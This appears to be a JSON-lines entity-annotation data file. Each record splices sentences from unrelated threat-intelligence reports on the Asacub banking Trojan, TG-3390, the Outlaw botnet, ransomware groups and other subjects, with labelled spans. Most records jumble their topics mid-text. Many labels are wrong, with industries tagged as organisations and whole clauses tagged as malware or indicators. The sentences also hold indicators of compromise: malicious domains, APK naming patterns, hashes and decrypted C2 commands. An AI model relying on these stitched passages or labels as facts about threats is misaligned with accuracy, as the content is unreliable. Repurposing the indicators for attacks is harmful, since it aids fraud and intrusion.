{"text": "Our eyes fell on the latest version of the Trojan , which is designed to steal money from owners of Android devices connected to the mobile banking service of one of Russia \u2019 s largest banks . To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts . As we \u2019ve observed with cybercriminal groups that aim to maximize profits for every campaign , silence does n\u2019t necessarily mean inactivity . None LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": [{"start": 100, "end": 107, "label": "System"}, {"start": 290, "end": 293, "label": "Organization"}, {"start": 315, "end": 322, "label": "Malware"}, {"start": 546, "end": 555, "label": "System"}, {"start": 556, "end": 665, "label": "Malware"}]}
{"text": "Asacub versions Sewn into the body of the Trojan is the version number , consisting of two or three digits separated by periods . CTU researchers assess with high confidence that threat groups like Threat Group-1314 will continue to live off of the land to avoid detection and conduct their operations . It appears hacking group Outlaw , which has been silent for the past few months , was simply developing their toolkit for illicit income sources . Threat actors often compete for the same resources , and this could n't be further from the truth when it comes to website compromises .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 130, "end": 133, "label": "Organization"}, {"start": 198, "end": 215, "label": "Organization"}, {"start": 329, "end": 335, "label": "Organization"}, {"start": 451, "end": 464, "label": "Organization"}, {"start": 566, "end": 585, "label": "Organization"}]}
{"text": "The numbering seems to have started anew after the version 9 . Analysis of TG-3390 's operations , targeting , and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China . While they have been quiet since our June analysis , we observed an increase in the group \u2019s activities in December , with updates on the kits \u2019 capabilities reminiscent of their previous attacks . They claim to have compromised the company and are willing to help resolve the issue .", "spans": [{"start": 75, "end": 82, "label": "Organization"}, {"start": 125, "end": 128, "label": "Organization"}, {"start": 450, "end": 515, "label": "Malware"}]}
{"text": "The name Asacub appeared with version 4 in late 2015 ; previous versions were known as Trojan-SMS.AndroidOS.Smaps . The threat actors target a wide range of organizations : CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects , but also targeting other industry verticals and attacking organizations involved in international relations . The updates expanded scanner parameters and targets , looped execution of files via error messages , improved evasion techniques for scanning activities , and improved mining profits by killing off both the competition and their own previous miners . The use of zero - day vulnerabilities by ransomware groups like CL0P may trigger a significant shift in ransomware strategies , mirroring the adoption of the \" double extortion \" tactic in 2019 .", "spans": [{"start": 9, "end": 15, "label": "Malware"}, {"start": 87, "end": 113, "label": "Indicator"}, {"start": 173, "end": 176, "label": "Organization"}, {"start": 203, "end": 210, "label": "Organization"}, {"start": 654, "end": 680, "label": "Vulnerability"}, {"start": 684, "end": 701, "label": "Organization"}, {"start": 707, "end": 711, "label": "Organization"}]}
{"text": "Versions 5.X.X-8.X.X were active in 2016 , and versions 9.X.X-1.X.X in 2017 . In comparison to other threat groups , TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger . We analyzed the kits , which were designed to steal information from the automotive and finance industries , launch subsequent attacks on already compromised systems , and ( possibly ) sell stolen information . In some campaigns , the random names are generated by a specific function in the VBA code .", "spans": [{"start": 117, "end": 124, "label": "Organization"}, {"start": 202, "end": 217, "label": "System"}, {"start": 222, "end": 239, "label": "System"}, {"start": 461, "end": 470, "label": "Organization"}, {"start": 473, "end": 542, "label": "Organization"}]}
{"text": "In 2018 , the most actively distributed versions were 5.0.0 and 5.0.3 . CTU researchers have evidence that the TG-3390 compromised U.S and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations . Comparing this development to their previous attacks , we think Outlaw may be aiming to go after enterprises that have yet to update their systems , assessing security and changes with their previously infected hosts , finding new and old targets , and possibly testing their updates in the wild . None Read about adversaries tracked by CrowdStrike in 2021 in the and in the \u2022 None Learn more about how can help your organization prepare to defend against sophisticated threats , respond and recover from incidents with speed and precision , and fortify your cybersecurity practices .", "spans": [{"start": 72, "end": 75, "label": "Organization"}, {"start": 111, "end": 118, "label": "Organization"}, {"start": 185, "end": 198, "label": "Organization"}, {"start": 214, "end": 223, "label": "Organization"}, {"start": 236, "end": 255, "label": "Organization"}, {"start": 260, "end": 270, "label": "Organization"}, {"start": 273, "end": 283, "label": "Organization"}, {"start": 286, "end": 292, "label": "Organization"}, {"start": 299, "end": 314, "label": "Organization"}, {"start": 319, "end": 328, "label": "Organization"}, {"start": 335, "end": 340, "label": "Organization"}, {"start": 469, "end": 475, "label": "Organization"}, {"start": 742, "end": 753, "label": "Organization"}]}
{"text": "Communication with C & C Although Asacub \u2019 s capabilities gradually evolved , its network behavior and method of communication with the command-and-control ( C & C ) server changed little . Based on analysis of the group 's SWCs , TG-3390 operations likely affect organizations in other countries and verticals . We will continue to observe the group \u2019s activities as they target industries from the United States and Europe . The purpose of these socially engineered lures is to convince the targeted users to enable macros , thereby allowing the execution chain to commence .", "spans": [{"start": 34, "end": 40, "label": "Malware"}, {"start": 224, "end": 228, "label": "System"}, {"start": 231, "end": 238, "label": "Organization"}]}
{"text": "This strongly suggested that the banking Trojans , despite differing in terms of capability , belong to the same family . TG-3390 operates a broad and long-running campaign of SWCs and has compromised approximately 100 websites as of this publication . Based on the samples we collected and traced to 456 distinct IPs , we expect the group to be more active in the coming months as we observed changes on the versions we acquired . PIEHOP utilizes LIGHTWORK to issue the IEC-104 commands \" ON \" or \" OFF \" to the remote system and then immediately deletes the executable after issuing the command .", "spans": [{"start": 122, "end": 129, "label": "Organization"}, {"start": 432, "end": 438, "label": "System"}, {"start": 448, "end": 457, "label": "System"}]}
{"text": "Data was always sent to the C & C server via HTTP in the body of a POST request in encrypted form to the relative address /something/index.php . CTU researchers have evidence that the threat group compromised U.S and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations . These new samples targeted Linux- and Unix-based operating systems , vulnerable servers , and internet of things ( IoT ) devices by exploiting known vulnerabilities with available exploits . The customers of these commercial spyware organizations know who their victim(s ) are .", "spans": [{"start": 122, "end": 142, "label": "Indicator"}, {"start": 145, "end": 148, "label": "Organization"}, {"start": 263, "end": 276, "label": "Organization"}, {"start": 292, "end": 301, "label": "Organization"}, {"start": 314, "end": 333, "label": "Organization"}, {"start": 338, "end": 348, "label": "Organization"}, {"start": 351, "end": 361, "label": "Organization"}, {"start": 364, "end": 370, "label": "Organization"}, {"start": 377, "end": 392, "label": "Organization"}, {"start": 397, "end": 406, "label": "Organization"}, {"start": 413, "end": 418, "label": "Organization"}, {"start": 510, "end": 516, "label": "System"}, {"start": 521, "end": 549, "label": "System"}, {"start": 697, "end": 729, "label": "Organization"}]}
{"text": "In earlier versions , the something part of the relative path was a partially intelligible , yet random mix of words and short combinations of letters and numbers separated by an underscore , for example , \u201c bee_bomb \u201d or \u201c my_te2_mms \u201d . Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization 's vertical or demographic to increase the likelihood of finding victims with relevant information . This time , the group explored unpatched systems vulnerable to CVE-2016-8655 and Dirty COW exploit ( CVE-2016-5195 ) as attack vectors . According to the Education Data Initiative , \" Public education spending in the United States falls short of global benchmarks and lags behind economic growth . \"", "spans": [{"start": 265, "end": 272, "label": "Organization"}, {"start": 310, "end": 314, "label": "System"}, {"start": 573, "end": 586, "label": "Vulnerability"}, {"start": 591, "end": 600, "label": "Vulnerability"}, {"start": 611, "end": 624, "label": "Vulnerability"}, {"start": 664, "end": 689, "label": "Organization"}]}
{"text": "Example of traffic from an early version of Asacub ( 2015 ) The data transmitted and received is encrypted with the RC4 algorithm and encoded using the base64 standard . Through an IP address whitelisting process , the threat group selectively targets visitors to these websites . Files using simple PHP-based web shells were also used to attack systems with weak SSH and Telnet credentials . CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": [{"start": 44, "end": 50, "label": "Malware"}, {"start": 364, "end": 367, "label": "Indicator"}, {"start": 372, "end": 378, "label": "Indicator"}, {"start": 393, "end": 416, "label": "Organization"}, {"start": 457, "end": 473, "label": "Organization"}]}
{"text": "The C & C address and the encryption key ( one for different modifications in versions 4.x and 5.x , and distinct for different C & Cs in later versions ) are stitched into the body of the Trojan . After the initial compromise , TG-3390 delivers the HTTPBrowser backdoor to its victims . While no phishing- or social engineering-initiated routines were observed in this campaign , we found multiple attacks over the network that are considered \u201c loud. \u201d These involved large-scale scanning operations of IP ranges intentionally launched from the command and control ( C&C ) server . Cisco Talos is aware of the recent advisory published by the U.S. Department of Health and Human Services ( HHS ) warning the healthcare industry about Rhysida ransomware activity .", "spans": [{"start": 229, "end": 236, "label": "Organization"}, {"start": 250, "end": 270, "label": "System"}, {"start": 546, "end": 565, "label": "System"}, {"start": 583, "end": 594, "label": "Organization"}, {"start": 644, "end": 696, "label": "Organization"}, {"start": 735, "end": 753, "label": "Malware"}]}
{"text": "In early versions of Asacub , .com , .biz , .info , .in , .pw were used as top-level domains . CTU researchers assess with high confidence that TG-3390 uses information gathered from prior reconnaissance activities to selectively compromise users who visit websites under its control . The honeynet graphs , which show activity peaks associated with specific actions , also suggest that the scans were timed . When ransomware source code or builders are leaked , it becomes easier for aspiring cybercriminals who lack the technical expertise to develop their own ransomware variants by making only minor modifications to the original code .", "spans": [{"start": 21, "end": 27, "label": "Malware"}, {"start": 95, "end": 98, "label": "Organization"}, {"start": 144, "end": 151, "label": "Organization"}, {"start": 410, "end": 460, "label": "Vulnerability"}]}
{"text": "In the 2016 version , the value of the User-Agent header changed , as did the method of generating the relative path in the URL : now the part before /index.php is a mix of a pronounceable ( if not entirely meaningful ) word and random letters and numbers , for example , \u201c muromec280j9tqeyjy5sm1qy71 \u201d or \u201c parabbelumf8jgybdd6w0qa0 \u201d . TG-3390 uses the PlugX remote access tool . We also considered the move as an obfuscation technique , as it was mixed with a lot of script kiddie activities that can easily be mistaken for grey noise online . In its spear phish , CloudLook also used a self - extracting archive containing a PDF file that lured its victims with information regarding world terrorism .", "spans": [{"start": 274, "end": 300, "label": "Indicator"}, {"start": 308, "end": 332, "label": "Indicator"}, {"start": 337, "end": 344, "label": "Organization"}, {"start": 354, "end": 378, "label": "System"}, {"start": 567, "end": 576, "label": "Malware"}]}
{"text": "Moreover , incoming traffic from the C & C server began to use gzip compression , and the top-level domain for all C & Cs was .com : Since December 2016 , the changes in C & C communication methods have affected only how the relative path in the URL is generated : the pronounceable word was replaced by a rather long random combination of letters and numbers , for example , \u201c ozvi4malen7dwdh \u201d or \u201c f29u8oi77024clufhw1u5ws62 \u201d . The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China . The attackers could hide their activities if they noted the business hours of the intended targets and performed the actions coinciding with said times . Ashley Madison \u2019s long - suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison \u2019s internal systems suggesting that a large percentage of the female accounts on the service were computer - operated bots .", "spans": [{"start": 378, "end": 393, "label": "Indicator"}, {"start": 401, "end": 426, "label": "Indicator"}, {"start": 435, "end": 438, "label": "System"}, {"start": 498, "end": 517, "label": "Organization"}, {"start": 522, "end": 543, "label": "Organization"}, {"start": 748, "end": 762, "label": "Organization"}, {"start": 900, "end": 914, "label": "Organization"}, {"start": 959, "end": 993, "label": "System"}, {"start": 1036, "end": 1051, "label": "Organization"}]}
{"text": "At the time of writing this article , no other significant changes in Asacub \u2019 s network behavior had been observed : The origin of Asacub It is fairly safe to say that the Asacub family evolved from Trojan-SMS.AndroidOS.Smaps . The threat actors have used the Baidu search engine , which is only available in Chinese , to conduct reconnaissance activities . From the sample we analyzed , attacks started from one virtual private server ( VPS ) that searches for a vulnerable machine to compromise ( previous techniques used malicious URLs or infecting legitimate websites for bot propagation ) . We also want to specifically thank Google \u2019s Threat Analysis Group ( TAG ) , Mandiant \u2019s DPRK Fusion Cell , and our government partners for their continued collaboration and support .", "spans": [{"start": 70, "end": 76, "label": "Malware"}, {"start": 132, "end": 138, "label": "Malware"}, {"start": 173, "end": 179, "label": "Malware"}, {"start": 200, "end": 226, "label": "Indicator"}, {"start": 261, "end": 280, "label": "System"}, {"start": 414, "end": 436, "label": "System"}, {"start": 439, "end": 442, "label": "System"}, {"start": 632, "end": 671, "label": "Organization"}, {"start": 674, "end": 702, "label": "Organization"}]}
{"text": "Communication between both Trojans and their C & C servers is based on the same principle , the relative addresses to which Trojans send network requests are generated in a similar manner , and the set of possible commands that the two Trojans can perform also overlaps . Recently , CTU researchers responded to an intrusion perpetrated by Threat Group-1314 , one of numerous threat groups that employ the \" living off the land \" technique to conduct their intrusions . Once infected , the C&C commands for the infected system launches a loud scanning activity and spreads the botnet by sending a \u201c whole kit \u201d of binary files at once with naming conventions same as the ones already in the targeted host , likely banking on breaking through via \u201c security through obscurity. \u201d They attempted to evade traffic inspection by encoding the code for the scanner with base-64 . In April 2021 , a new campaign by OilRig was discovered by researchers at Checkpoint in which the group employed a new backdoor variant dubbed SideTwist against what appears to be a Lebanese target .", "spans": [{"start": 283, "end": 286, "label": "Organization"}, {"start": 340, "end": 357, "label": "Organization"}, {"start": 490, "end": 493, "label": "System"}, {"start": 895, "end": 903, "label": "Organization"}, {"start": 907, "end": 913, "label": "Organization"}, {"start": 947, "end": 957, "label": "Organization"}, {"start": 1016, "end": 1025, "label": "Malware"}, {"start": 1055, "end": 1070, "label": "Organization"}]}
{"text": "What \u2019 s more , the numbering of Asacub versions is a continuation of the Smaps system . CTU researchers have observed the Threat Group-3390 obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both . The zombie host initiates the scan \u2014 another routine from previous campaigns \u2014 but updated with a larger set of parameters and programmed to run in the background . Following a three - month lull of activity , Cl0p returned with a vengeance in June and beat out LockBit as the month \u2019s most active ransomware gang .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 74, "end": 79, "label": "Malware"}, {"start": 89, "end": 92, "label": "Organization"}, {"start": 130, "end": 140, "label": "Organization"}, {"start": 178, "end": 190, "label": "Organization"}, {"start": 308, "end": 327, "label": "Organization"}, {"start": 550, "end": 554, "label": "Organization"}, {"start": 602, "end": 609, "label": "Organization"}]}
{"text": "The main difference is that Smaps transmits data as plain text , while Asacub encrypts data with the RC4 algorithm and then encodes it into base64 format . CTU researchers have observed the threat group obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both . The kit we found is in tgz format , though we have observed some samples disguised as png or jpg . Tools for phishing analysis and remediation that save security operations teams time and help find indicators of compromise across a sea of suspicious messages can also make a big difference in the fight against ransomware .", "spans": [{"start": 28, "end": 33, "label": "Malware"}, {"start": 71, "end": 77, "label": "Malware"}, {"start": 156, "end": 159, "label": "Organization"}, {"start": 240, "end": 252, "label": "Organization"}, {"start": 370, "end": 389, "label": "Organization"}]}
{"text": "Let \u2019 s compare examples of traffic from Smaps and Asacub \u2014 an initializing request to the C & C server with information about the infected device and a response from the server with a command for execution : Smaps request Asacub request Decrypted data from Asacub traffic : { \u201c id \u201d : \u201d 532bf15a-b784-47e5-92fa-72198a2929f5\u2033 , \u201d type \u201d : \u201d get \u201d , \u201d info \u201d : \u201d imei:365548770159066 , country : PL , cell : Tele2 TG-3390 can quickly leverage compromised network infrastructure during an operation and can conduct simultaneous intrusions into multiple environments . While previous routines took advantage of competing miners \u2019 activities and unrelated components to hijack the profit , the latest version of the code attempts to remove all related files and codes from previous infections ( including their own to make sure the running components are updated , as well as those from other cybercriminals to maximize the resources of the zombie host ) and creates a new working directory /tmp/.X19-unix to move the kit and extract the files . After Kaspersky \u2019s reports of these attacks , the rest of 2013 saw reduced intensity of the campaign .", "spans": [{"start": 41, "end": 46, "label": "Malware"}, {"start": 51, "end": 57, "label": "Malware"}, {"start": 209, "end": 214, "label": "Malware"}, {"start": 223, "end": 229, "label": "Malware"}, {"start": 258, "end": 264, "label": "Malware"}, {"start": 288, "end": 325, "label": "Indicator"}, {"start": 413, "end": 420, "label": "Organization"}, {"start": 1048, "end": 1060, "label": "Organization"}, {"start": 1134, "end": 1142, "label": "Organization"}]}
{"text": ", android:4.2.2 , model : GT-N5100 , phonenumber : +486679225120 , sim:6337076348906359089f , app : null , ver:5.0.2\u2033 } Data sent to the server [ { \u201c command \u201d : \u201d sent & & & \u201d , \u201d params \u201d : { \u201c to \u201d : \u201d +79262000900\u2033 , \u201d body \u201d : \u201d \\u0410\\u0412\\u0422\\u041e\\u041f\\u041b\\u0410\\u0422\\u0415\\u0416 Malware used by the threat group can be configured to bypass network-based detection ; however , the threat actors rarely modify host-based configuration settings when deploying payloads . The tsm binary then runs in the background , forwarding a series of error messages to /dev/null to keep the code running , ensuring the continuous execution of the code referenced with a set of parameters /tmp/up.txt . Based on our research , we discovered an unknown threat actor using MortalKombat ransomware since December 2022 to target individuals and smaller companies .", "spans": [{"start": 295, "end": 302, "label": "System"}, {"start": 771, "end": 783, "label": "Organization"}, {"start": 825, "end": 858, "label": "Organization"}]}
{"text": "1000 50\u2033 , \u201d timestamp \u201d : \u201d 1452272572\u2033 } } , { \u201c command \u201d : \u201d sent & & & \u201d , \u201d params \u201d : { \u201c to \u201d : \u201d +79262000900\u2033 , \u201d body \u201d : \u201d BALANCE \u201d , \u201d timestamp \u201d : \u201d 1452272573\u2033 } } ] Instructions received from the server A comparison can also be made of the format in which Asacub and Smaps forward incoming SMS ( encoded with the base64 algorithm ) from the device to the C & C server : Smaps TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication . The script then waits 20 minutes before it runs the wrapper script initall : The CozyDuke malware utilizes a backdoor and dropper , and exfiltrates data to a C2 server .", "spans": [{"start": 394, "end": 401, "label": "Organization"}, {"start": 450, "end": 453, "label": "Organization"}, {"start": 508, "end": 525, "label": "Vulnerability"}, {"start": 618, "end": 625, "label": "Indicator"}, {"start": 632, "end": 640, "label": "Malware"}, {"start": 709, "end": 718, "label": "System"}]}
{"text": "format Asacub format Decrypted data from Asacub traffic : { \u201c data \u201d : \u201d 2015:10:14_02:41:15\u2033 , \u201d id \u201d : \u201d 532bf15a-b784-47e5-92fa-72198a2929f5\u2033 , \u201d text \u201d : \u201d SSB0aG91Z2h0IHdlIGdvdCBwYXN0IHRoaXMhISBJJ20gbm90IGh1bmdyeSBhbmQgbmU= \u201d , \u201d number \u201d : \u201d 1790\u2033 , \u201d type In addition to using SWCs to target specific types of organizations , TG-3390 uses spearphishing emails to target specific victims . 2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a install . Utilizing multiple security solutions may become even more important as the level of sophistication in malware grows .", "spans": [{"start": 107, "end": 144, "label": "Indicator"}, {"start": 284, "end": 288, "label": "System"}, {"start": 333, "end": 340, "label": "Organization"}, {"start": 396, "end": 460, "label": "Indicator"}, {"start": 461, "end": 468, "label": "Indicator"}]}
{"text": "\u201d : \u201d load \u201d } Propagation The banking Trojan is propagated via phishing SMS containing a link and an offer to view a photo or MMS . After gaining access to a target network in one intrusion analyzed by CTU researchers , TG-3390 actors identified and exfiltrated data for specific projects run by the target organization , indicating that they successfully obtained the information they sought . Another variant executes a set of commands once a system is successfully compromised . Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015 .", "spans": [{"start": 203, "end": 206, "label": "Organization"}, {"start": 221, "end": 228, "label": "Organization"}, {"start": 483, "end": 490, "label": "Organization"}, {"start": 569, "end": 591, "label": "Organization"}, {"start": 603, "end": 611, "label": "Organization"}]}
{"text": "The link points to a web page with a similar sentence and a button for downloading the APK file of the Trojan to the device . Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs . Most of these commands are related to gathering information from the infected machine ( number of CPU cores , users , scheduled tasks , running processes , OS installed , and CPU and memory information ) via the dota3 payload , as well as changing the password to a random string also stored in /tmp/up.txt . Recently , concerns have grown regarding the rapid growth of commercial spyware tools , and the way in which they are being used against their intended victims .", "spans": [{"start": 154, "end": 157, "label": "Organization"}, {"start": 182, "end": 189, "label": "Organization"}, {"start": 291, "end": 313, "label": "Organization"}, {"start": 319, "end": 330, "label": "Organization"}, {"start": 554, "end": 559, "label": "System"}, {"start": 712, "end": 736, "label": "System"}]}
{"text": "The Trojan download window Asacub masquerades under the guise of an MMS app or a client of a popular free ads service . Incident response engagements have given CTU researchers insight into the tactics TG-3390 employs during intrusions . In a previous execution ( published in June 2019 ) , we observed that dota2 had its own folder but it was hardly executed , indicating that this version is the updated iteration . A rough translation of this message is as follows : Hack520 seems to be very interested in hosting services and his profile fits that of a system administrator profile with some programming and hacking skills .", "spans": [{"start": 27, "end": 33, "label": "Malware"}, {"start": 161, "end": 164, "label": "Organization"}, {"start": 202, "end": 209, "label": "Organization"}, {"start": 308, "end": 313, "label": "System"}, {"start": 470, "end": 477, "label": "Organization"}]}
{"text": "We came across the names Photo , Message , Avito Offer , and MMS Message . CTU researchers have not observed TG-3390 actors performing reconnaissance prior to compromising organizations . Running the script removes the remaining files and scripts from previous attacks , keeping a low profile to evade detection . \u201c It appears to be the email address Will used for his profiles , \u201d the IT director replied .", "spans": [{"start": 75, "end": 78, "label": "Organization"}, {"start": 109, "end": 116, "label": "Organization"}, {"start": 159, "end": 185, "label": "Organization"}, {"start": 351, "end": 355, "label": "Organization"}, {"start": 386, "end": 397, "label": "Organization"}]}
{"text": "App icons under which Asacub masks itself The APK files of the Trojan are downloaded from sites such as mmsprivate [ . CTU researchers have observed the threat actors installing a credential logger and backdoor on Microsoft Exchange servers , which requires a technical grasp of Internet Information Services ( IIS ) . If the system has been previously infected with a cryptominer , it also attempts to kill the running miner and all its related activities . Rhysida , a new ransomware gang claiming to be a \" cybersecurity team , \" has been in operation since May 17 , 2023 , making headlines for their high - profile attack against the Chilean Army .", "spans": [{"start": 22, "end": 28, "label": "Malware"}, {"start": 104, "end": 118, "label": "Indicator"}, {"start": 119, "end": 122, "label": "Organization"}, {"start": 180, "end": 197, "label": "System"}, {"start": 459, "end": 466, "label": "Organization"}, {"start": 638, "end": 650, "label": "Organization"}]}
{"text": "] site , photolike [ . TG-3390 is capable of using a C2 infrastructure that spans multiple networks and registrars . Based on a bashtemp directory of the latest sample we found , there are other compiled ELF scripts , named init and init2 , that loops the kit to keep running : However , a log file on the server indicates that the C2 framework has been active since at least September 2017 , and probably \" hosted on different servers over time . \"", "spans": [{"start": 9, "end": 22, "label": "Indicator"}, {"start": 23, "end": 30, "label": "Organization"}, {"start": 204, "end": 207, "label": "System"}, {"start": 224, "end": 228, "label": "Indicator"}, {"start": 233, "end": 238, "label": "Indicator"}, {"start": 288, "end": 312, "label": "Indicator"}, {"start": 328, "end": 390, "label": "Indicator"}, {"start": 397, "end": 445, "label": "Indicator"}]}
{"text": "] fun , you-foto [ . TG-3390 SWCs may be largely geographically independent , but the group 's most frequently used C2 registrars and IP net blocks are located in the U.S . 0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6 The utility is located in the \u201c \\sc\\prog\\exec \u201d folder within the MicroSCADA installation directory , amongst other utilities , libraries , and resources used by MicroSCADA .", "spans": [{"start": 8, "end": 20, "label": "Indicator"}, {"start": 21, "end": 28, "label": "Organization"}, {"start": 238, "end": 337, "label": "Indicator"}]}
{"text": "] site , and mms4you [ . Using a U.S.-based C2 infrastructure ( see Figure 7 ) to compromise targets in the U.S. helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense . S-SHA2init . 93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494 For example , in its 2020 Internet Crime Report released in March , the FBI confirmed the total cost of attacks reported to the bureau in 2020 amounted to 29.1 million , an increase of more than 200 from the year before .", "spans": [{"start": 13, "end": 24, "label": "Indicator"}, {"start": 33, "end": 61, "label": "System"}, {"start": 119, "end": 126, "label": "Organization"}, {"start": 205, "end": 215, "label": "Indicator"}, {"start": 355, "end": 358, "label": "Organization"}]}
{"text": "] me under names in the format : photo_ [ number ] _img.apk , mms_ [ number ] _img.apk avito_ [ number ] .apk , mms.img_ [ number ] _photo.apk , mms [ number ] _photo.image.apk , mms [ number ] _photo.img.apk , mms.img.photo_ [ number ] .apk , photo_ [ number ] _obmen.img.apk . The threat actors create PlugX DLL stub loaders that will run only after a specific date . S-SHA2init2 . To continue the home security analogy , if the window was nt left open , the attacker would likely have gone somewhere else , and the same principle applies in the digital world .", "spans": [{"start": 33, "end": 59, "label": "Indicator"}, {"start": 62, "end": 86, "label": "Indicator"}, {"start": 87, "end": 109, "label": "Indicator"}, {"start": 112, "end": 142, "label": "Indicator"}, {"start": 145, "end": 176, "label": "Indicator"}, {"start": 179, "end": 208, "label": "Indicator"}, {"start": 211, "end": 241, "label": "Indicator"}, {"start": 244, "end": 276, "label": "Indicator"}, {"start": 304, "end": 313, "label": "System"}, {"start": 370, "end": 381, "label": "Indicator"}, {"start": 461, "end": 469, "label": "Organization"}]}
{"text": "For the Trojan to install , the user must allow installation of apps from unknown sources in the device settings . The compile dates of the samples analyzed by CTU researchers are all later than the hard-coded August 8 , 2013 date , indicating that the code might be reused from previous tools . Both init and init2 scripts make sure all other running mining services are killed , and that all the files in the working directory are executed by giving 777 permissions . Budworm executes SysUpdate on victim networks by DLL sideloading the payload using the legitimate INISafeWebSSO application .", "spans": [{"start": 160, "end": 163, "label": "Organization"}, {"start": 301, "end": 305, "label": "Indicator"}, {"start": 310, "end": 315, "label": "Indicator"}, {"start": 470, "end": 477, "label": "Organization"}, {"start": 487, "end": 496, "label": "Malware"}, {"start": 568, "end": 593, "label": "System"}]}
{"text": "Infection During installation , depending on the version of the Trojan , Asacub prompts the user either for Device Administrator rights or for permission to use AccessibilityService . One archive sample analyzed by CTU researchers contained a legitimate PDF file , a benign image of interest to targets ( see Figure 8 ) , and an HTTPBrowser installer disguised as an image file . We also found the init0 script running ; the script cleans out all miners regardless of its origin . Additionally , Mandiant was able to uncover additional infrastructure due to the fact that a PTR record was never changed from a previous operation .", "spans": [{"start": 73, "end": 79, "label": "Malware"}, {"start": 215, "end": 218, "label": "Organization"}, {"start": 254, "end": 262, "label": "System"}, {"start": 329, "end": 350, "label": "System"}, {"start": 398, "end": 403, "label": "Indicator"}, {"start": 558, "end": 628, "label": "Indicator"}]}
{"text": "After receiving the rights , it sets itself as the default SMS app and disappears from the device screen . CTU researchers have observed TG-3390 activity between 04:00 and 09:00 UTC , which is 12:00 to 17:00 local time in China ( UTC +8 ) . It then resets cron and removes possible cache files from other programs , starts scripts and binaries a , init0 , and start , and sets the persistence by modifying the crontab . CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": [{"start": 107, "end": 110, "label": "Organization"}, {"start": 344, "end": 345, "label": "Indicator"}, {"start": 348, "end": 353, "label": "Indicator"}, {"start": 420, "end": 440, "label": "Organization"}, {"start": 471, "end": 497, "label": "Organization"}, {"start": 552, "end": 584, "label": "System"}, {"start": 601, "end": 617, "label": "Vulnerability"}, {"start": 622, "end": 638, "label": "Vulnerability"}]}
{"text": "If the user ignores or rejects the request , the window reopens every few seconds . TG-3390 sends spearphishing emails with ZIP archive attachments . The a binary is a script wrapper to start run , a Perl-obfuscated script for installation of a Shellbot to gain control of the infected system . Ransomware source code is a malicious program that contains the instructions and algorithms that define the ransomware \u2019s behavior .", "spans": [{"start": 84, "end": 91, "label": "Organization"}, {"start": 168, "end": 182, "label": "System"}, {"start": 200, "end": 222, "label": "System"}, {"start": 245, "end": 253, "label": "Malware"}, {"start": 295, "end": 317, "label": "Malware"}]}
{"text": "The Trojan requests Device Administrator rights The Trojan requests permission to use AccessibilityService After installation , the Trojan starts communicating with the cybercriminals \u2019 C & C server . CTU researchers have observed TG-3390 compromising a target organization 's externally and internally accessible assets , such as an OWA server , and adding redirect code to point internal users to an external website that hosts an exploit and delivers malware . The Shellbot disguises itself as a process named rsync , commonly the binary seen on many Unix- and Linux-based systems to automatically run for backup and synchronization . Anonymous Sudan has targeted organizations associated with infrastructure and key services , including in government and private sectors .", "spans": [{"start": 201, "end": 204, "label": "Organization"}, {"start": 231, "end": 238, "label": "Organization"}, {"start": 468, "end": 476, "label": "Malware"}, {"start": 554, "end": 559, "label": "System"}, {"start": 564, "end": 583, "label": "System"}, {"start": 638, "end": 653, "label": "Organization"}, {"start": 667, "end": 711, "label": "Organization"}, {"start": 716, "end": 728, "label": "Organization"}, {"start": 744, "end": 754, "label": "Organization"}, {"start": 759, "end": 774, "label": "Organization"}]}
{"text": "All data is transmitted in JSON format ( after decryption ) . TG-3390 actors have used Java exploits in their SWCs . This allows the malicious activity to evade detection . The victims have been in the Americas , EMEA , and APJ as of writing .", "spans": [{"start": 62, "end": 69, "label": "Organization"}, {"start": 87, "end": 100, "label": "Vulnerability"}, {"start": 110, "end": 114, "label": "System"}]}
